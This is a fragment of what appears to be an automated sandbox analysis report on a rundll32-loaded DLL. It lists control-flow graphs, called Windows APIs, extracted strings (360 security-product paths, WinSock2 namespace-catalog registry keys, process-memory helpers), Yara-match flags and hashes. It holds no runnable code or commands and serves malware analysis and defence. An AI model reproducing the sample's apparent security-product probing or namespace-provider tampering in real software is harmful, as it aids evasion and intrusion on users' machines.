                                                                                    control_flow_graph 369 1800701f0-180070219 VirtualAlloc 372 18007021c-180070251 369->372 372->372 373 180070253-180070272 VirtualAlloc 372->373 374 180070278-18007029a 373->374 375 1800704da 373->375 377 1800702b8-1800702d7 374->377 378 18007029c-1800702a2 374->378 376 1800704dc-1800704ef 375->376 377->375 380 1800702dd-1800702e1 377->380 379 1800702a5-1800702b6 378->379 379->377 379->379 381 1800702e4-1800702ea 380->381 382 1800702fc-1800702ff 381->382 383 1800702ec 381->383 384 180070311-180070326 382->384 385 180070301-18007030b 382->385 383->375 388 180070328 384->388 389 180070340-18007034d 384->389 385->384 386 18007030d 385->386 386->384 390 18007032b-18007033e 388->390 389->381 391 18007034f-180070352 389->391 390->389 390->390 391->375 392 180070358-180070360 391->392 393 180070366 392->393 394 180070414-18007041e 392->394 394->375 395 180070424-18007042b 394->395 396 180070487-180070494 395->396 397 18007042d 395->397 399 180070496-1800704a2 396->399 400 1800704bc-1800704d8 396->400 398 180070431-18007043f 397->398 398->375 405 180070445-18007044b 398->405 401 1800704b4-1800704ba 399->401 400->375 400->376 401->400 403 1800704a4-1800704b0 401->403 403->401 406 180070478-18007047c 405->406 408 18007047e-180070485 406->408 409 18007044d-180070460 406->409 408->396 408->398 410 180070467-18007046b 409->410 411 180070462-180070465 409->411 412 18007046e-180070474 410->412 411->412 412->406
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID: S5Xl
                                                                                    • API String ID: 4275171209-3963265540
                                                                                    • Opcode ID: 955a37318a42581a82527350a65807328e5baf708e28549c0701e7bd005047f0
                                                                                    • Instruction ID: 8627bea6adcabeb617a02013d3036f8ce64dc83beb87997f1cd45eda72222d63
                                                                                    • Opcode Fuzzy Hash: 955a37318a42581a82527350a65807328e5baf708e28549c0701e7bd005047f0
                                                                                    • Instruction Fuzzy Hash: B63146733116A886CB56CF75A548FEC3BAAF718BC8F5281268E4D07B55DE39C11AC300
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000026387CF0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_26387cf0000_rundll32.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$CreateProcess
                                                                                    • String ID:
                                                                                    • API String ID: 2922976086-0
                                                                                    • Opcode ID: cd309ebfe44d1ce1b9eebeab880966758d8a8f2593ff83e7c251b015e6764e6d
                                                                                    • Instruction ID: c2a345e4464d3ed3be47b6d487803b4f00bfe09e4ea6c44b70dfa31cd945c19c
                                                                                    • Opcode Fuzzy Hash: cd309ebfe44d1ce1b9eebeab880966758d8a8f2593ff83e7c251b015e6764e6d
                                                                                    • Instruction Fuzzy Hash: B0110432608A8087E760DF24F48879EBBB1F7C4358F505125B68983AA9DBBDC559CF00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000026387CF0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_26387cf0000_rundll32.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Volume$Find$CloseFirstInformation
                                                                                    • String ID:
                                                                                    • API String ID: 586543143-0
                                                                                    • Opcode ID: f8471610ee8cd183a9485870a89c6ee0d7cca4bc8c0aade8722fc7fa7e06f6f6
                                                                                    • Instruction ID: d9a6cfbdb3d0a3f8776d79000448761c0e17e02d359b9e27a3594df07174d20e
                                                                                    • Opcode Fuzzy Hash: f8471610ee8cd183a9485870a89c6ee0d7cca4bc8c0aade8722fc7fa7e06f6f6
                                                                                    • Instruction Fuzzy Hash: 7611DD32519A4097E760DB11F4883DEB3B6F785350FA40226F2A943AE9DF7DC65ACB40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000026387CF0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_26387cf0000_rundll32.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseEventHandleMutexRelease
                                                                                    • String ID:
                                                                                    • API String ID: 3391745777-0
                                                                                    • Opcode ID: 34ec866cfd7482a0b3d3af7380d3e699ee32a18233fddf405b1384eaf4aff779
                                                                                    • Instruction ID: ee1686d11e9ffe217e732fa169bf2154ad47893434995203a0c19c0e34b41da5
                                                                                    • Opcode Fuzzy Hash: 34ec866cfd7482a0b3d3af7380d3e699ee32a18233fddf405b1384eaf4aff779
                                                                                    • Instruction Fuzzy Hash: F6F05A34504A40E2E7A0DB18E84C79C2772FB84B48F402215F86E436B4CFBECA8DCA18
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID: S5Xl
                                                                                    • API String ID: 4275171209-3963265540
                                                                                    • Opcode ID: 890a37e0230ef105c6c23fffcb61ff4111ea649d379bd8e7c52efb5e0244a4c1
                                                                                    • Instruction ID: cfc6a34ce132622bae8ceb4dc72cd21c5819cecda536a8dbeac765b14806de91
                                                                                    • Opcode Fuzzy Hash: 890a37e0230ef105c6c23fffcb61ff4111ea649d379bd8e7c52efb5e0244a4c1
                                                                                    • Instruction Fuzzy Hash: 691106723217A885CE61CF35A54CFA82BA9F71CFC8F1691158E4D13B01DE39C019C300
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000026387CF0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_26387cf0000_rundll32.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CurrentFormatFreeMemoryPathUserVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 2593304397-0
                                                                                    • Opcode ID: f52ee2aa33d777d70af5112c0a56f381be43764fb5e061da45e694194d02d43a
                                                                                    • Instruction ID: 918714906edfec2cf624cfefce0992cbfa01a271c344ec90311edf735427ad07
                                                                                    • Opcode Fuzzy Hash: f52ee2aa33d777d70af5112c0a56f381be43764fb5e061da45e694194d02d43a
                                                                                    • Instruction Fuzzy Hash: 42214532A1454293EA70DB21E4887DE63F2F794388F505515B6CD835AEEB7ED7068701
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000026387CF0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_26387cf0000_rundll32.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: 252c82bd18f63079363c04d0726cb3e85d9e951d6d0439d97e6f477b3e596fc1
                                                                                    • Instruction ID: 3f5aeb084a1e7d638043e005396a2c05984a49becf1310f00a28fe0ae8994abc
                                                                                    • Opcode Fuzzy Hash: 252c82bd18f63079363c04d0726cb3e85d9e951d6d0439d97e6f477b3e596fc1
                                                                                    • Instruction Fuzzy Hash: 1BE09231A38A8087E3A0EB34E8483EE6E71E381350F941520B9E2839C9DB69C1168E00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: 121f1415670ded573bb7e3f76694802e64cce90aa816079046d2fabcf07b22fa
                                                                                    • Instruction ID: fdd3b53fd5ef90cd25e79b7e67ac9ef4d4291e3d36f58b03b6eae1744e84b5e2
                                                                                    • Opcode Fuzzy Hash: 121f1415670ded573bb7e3f76694802e64cce90aa816079046d2fabcf07b22fa
                                                                                    • Instruction Fuzzy Hash: 42C01262B0D6D049D7056B7420A469E2FB16762789B05405A4B4163E69C8388206C704
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: Filememmove$CloseHandlememset$Local$CreateCurrentDescriptorFreeMappingProcessSecurityViewWindow$AllocAppendCountDaclExecuteFindForegroundInitializeModuleNameObjectPathShellSingleSizeSleepThreadTickUnmapWaitrandsrandwsprintf
                                                                                    • String ID: %u_%d_%d_%d_%u$..\360DeskAna64.exe$/%s %s %u$Progman$Program manager$open$se1$se2
                                                                                    • API String ID: 1121195023-828389715
                                                                                    • Opcode ID: bf27cba7947237ddb48d80a7ebe4eca32a8cf6ef406abc02a9deeb192b889f14
                                                                                    • Instruction ID: 9c018b3ec5208d5dc303fe800ce77a7618bf785d2afa65f14d01c037d361c4e0
                                                                                    • Opcode Fuzzy Hash: bf27cba7947237ddb48d80a7ebe4eca32a8cf6ef406abc02a9deeb192b889f14
                                                                                    • Instruction Fuzzy Hash: D332CC72604B8886FB96CF25D8803DD73B1F789BD8F528116EA5947BA4DF38C649C708
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: memset$FilePath$Exists$BackslashCloseModuleNameOpenQueryValue
                                                                                    • String ID: %s\%s$360SkinMgr.exe$360leakfixer.exe$Path$SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe$SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360sd.exe$hipsver.dll$safemon\360Cactus.tpi$safemon\FreeSaaS.tpi$safemon\pedrver.dll
                                                                                    • API String ID: 4260417939-4002867936
                                                                                    • Opcode ID: 69930986b2b6c6c437e187827024c0865ac4d7e0e25485b3d46344904dffa666
                                                                                    • Instruction ID: bf4960b57fd98bc25e9fd953caee1d48b1d668c6bea79cfa729634ea3028d897
                                                                                    • Opcode Fuzzy Hash: 69930986b2b6c6c437e187827024c0865ac4d7e0e25485b3d46344904dffa666
                                                                                    • Instruction Fuzzy Hash: BCB13D31614E8895EBA2DB21EC543DA63A4F78DBC4F908116FA9D87A95EF39C70DC700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Read$Pointer$CloseHandlememmove$??3@$ByteCharCreateMultiSizeWide_wcslwrwcschr
                                                                                    • String ID: 9
                                                                                    • API String ID: 2469906296-2366072709
                                                                                    • Opcode ID: 1edc00ec3368a205bebbe676ef1486fb611a75b6483dacecd85243c6051295a2
                                                                                    • Instruction ID: b16b18eef39a39b515becb99aaa5640e1c6952976385d86e077c0efac659451c
                                                                                    • Opcode Fuzzy Hash: 1edc00ec3368a205bebbe676ef1486fb611a75b6483dacecd85243c6051295a2
                                                                                    • Instruction Fuzzy Hash: 43D1D072300A8886EBA6DF25E8507ED37A1F749BD8F448614FE5647BA8DF38C249C700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$Modulememset$CombineFileFreeHandleLibraryNamePath
                                                                                    • String ID: ..\ipc\x64for32lib.dll$EnumProcessModules64$GetCommandLine64$GetCurrentDirectory64$GetModuleBaseNameW64$GetModuleFileNameExW64$GetModuleInformation64$IsProcessWow64Process$NtQueryInformationProcess64$NtQueryInformationThread64$ReadProcessMemory64
                                                                                    • API String ID: 3359005274-2277939915
                                                                                    • Opcode ID: 11406f1aeae7bd1ca1e9419c163a9dd1d65d254f22157801c59e7a4b8def0cf2
                                                                                    • Instruction ID: 36480451210aca2b5e6fe81c352119384c097133635e903ecd0715684d47c6ca
                                                                                    • Opcode Fuzzy Hash: 11406f1aeae7bd1ca1e9419c163a9dd1d65d254f22157801c59e7a4b8def0cf2
                                                                                    • Instruction Fuzzy Hash: 2D512532201F5AA2EEA58F51E99439833A5FB4C7C0F549525EA5907A60DF38D3B9C710
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: memset$Close$Open$Enumfree
                                                                                    • String ID: HKEY_LOCAL_MACHINE\$\Components\$\Features\$\Products\
                                                                                    • API String ID: 1285027818-2258373985
                                                                                    • Opcode ID: 9906bf7cd91924df8938282da413fefd9331e0d97fbadb0acae730663cf89f7c
                                                                                    • Instruction ID: 6311c4a4e92b2eb2b6e61e2371f742115398930d0f6aaa53fdf69de799299566
                                                                                    • Opcode Fuzzy Hash: 9906bf7cd91924df8938282da413fefd9331e0d97fbadb0acae730663cf89f7c
                                                                                    • Instruction Fuzzy Hash: 9C126F72218AC891FAB2EB55E8453DAB365FB897C4F448111FA8E43A99DF3DC749C700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000026387CF0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_26387cf0000_rundll32.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Handle$Pipe$CloseCreate$InformationProcess$FileMemoryNamedPeekReadVirtual$AllocateCodeDelayExecutionExitFreeTerminate
                                                                                    • String ID: h
                                                                                    • API String ID: 30365702-2439710439
                                                                                    • Opcode ID: eb7bea1748a89db5f07d023bcdb676065683870e413be2d4ad1df109deaa66ff
                                                                                    • Instruction ID: 7b7b59be65ce33d41ed10ea6540e1e6c582c95d3c1b02e1f8befb392e886dc4f
                                                                                    • Opcode Fuzzy Hash: eb7bea1748a89db5f07d023bcdb676065683870e413be2d4ad1df109deaa66ff
                                                                                    • Instruction Fuzzy Hash: 65C1EF32608BC08BE760DB64E49879EB7B2F7C4754F504115EA8983AA9DFBEC549CF00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: Windowmemset$MessageQuerySendTimeoutValue$CloseFindForegroundOpenmemmove
                                                                                    • String ID: MsgCenter$Q360SafeMonClass$TS2P$activeapp$activeweb
                                                                                    • API String ID: 3772276521-2728888700
                                                                                    • Opcode ID: 252ce8677bfb522a4b6632ad157aa9371a8792e99c65b85e20036a72b1270932
                                                                                    • Instruction ID: ee8cae4e48a5beadbc07239537d79e19b069e47090ef93ff609d4821bf219365
                                                                                    • Opcode Fuzzy Hash: 252ce8677bfb522a4b6632ad157aa9371a8792e99c65b85e20036a72b1270932
                                                                                    • Instruction Fuzzy Hash: C1D19172604B4886EB51DF25E8403DE7761F789BE8F608215EAAD43BE5DF38C649CB40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$calloc$memset
                                                                                    • String ID: -$]$]
                                                                                    • API String ID: 2591755499-1349866957
                                                                                    • Opcode ID: 2679cd0fb79ab9e79cb7ec4cb87940f65e1566cfba3dc15da5d319deb0b258b9
                                                                                    • Instruction ID: 1d85a50f400dc416e5d0a718f77556582d5ce19bdf984b68484f18af02043cc0
                                                                                    • Opcode Fuzzy Hash: 2679cd0fb79ab9e79cb7ec4cb87940f65e1566cfba3dc15da5d319deb0b258b9
                                                                                    • Instruction Fuzzy Hash: BCA1D272706BC892EB96CB16D0403A977A1F74D780F449616EB8A17B81DF39D2B9D300
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: Timefree$??3@System$FileMutexRelease
                                                                                    • String ID: AND $ SLEV = %d $ TYPE = %d$ WHERE $DELETE FROM 'MT' $INSERT INTO "MT" VALUES ( ?,?,?,?,?,?,?,?,?,?,?,?,NULL ) $ModName LIKE '$TimeStamp < %I64d;
                                                                                    • API String ID: 2360919559-3261407791
                                                                                    • Opcode ID: 0fdc13341be9cf7c256e26cb2936a3b5a8a79f5d9c0121a176094682301e8f56
                                                                                    • Instruction ID: fbbc87ecfbf22c2b8803d4662eccf4799cfebf60f86054df91e993a66dbd8da4
                                                                                    • Opcode Fuzzy Hash: 0fdc13341be9cf7c256e26cb2936a3b5a8a79f5d9c0121a176094682301e8f56
                                                                                    • Instruction Fuzzy Hash: B102B332711A4C85FFB29BA5D4403DD2361AB887D8F148627BE2E6B7D4DE3AC649C300
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$CloseDeleteEnterLeaveOpenmemset
                                                                                    • String ID: %s\%s$Catalog_Entries$Catalog_Entries64$NameSpace_Catalog5$Num_Catalog_Entries$Num_Catalog_Entries64$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\%s$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\%s\%012d
                                                                                    • API String ID: 2413450229-732542554
                                                                                    • Opcode ID: 5d3b3c8892c10d7fff7567f6933cd8fc0a8177a7f871dcf3f8d0113f8f36deb6
                                                                                    • Instruction ID: 3ab1713314ff84c9548747a70e29f101a91a5434d94fe8d6158548384223fcd6
                                                                                    • Opcode Fuzzy Hash: 5d3b3c8892c10d7fff7567f6933cd8fc0a8177a7f871dcf3f8d0113f8f36deb6
                                                                                    • Instruction Fuzzy Hash: 69C1DEB1701A4D82EEA6DB29E8457D963A0F788BD4F04C422FE0D1B7A5DF39C64AC700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 0000000180008C68: CharNextW.USER32 ref: 0000000180008CA7
                                                                                      • Part of subcall function 0000000180008C68: CharNextW.USER32 ref: 0000000180008CD3
                                                                                      • Part of subcall function 0000000180008C68: CharNextW.USER32 ref: 0000000180008D81
                                                                                    • lstrcmpiW.KERNEL32(?,00000000,00000000,?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000), ref: 00000001800083C8
                                                                                    • lstrcmpiW.KERNEL32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 00000001800083E6
                                                                                    • CharNextW.USER32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 0000000180008457
                                                                                    • CharNextW.USER32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 0000000180008541
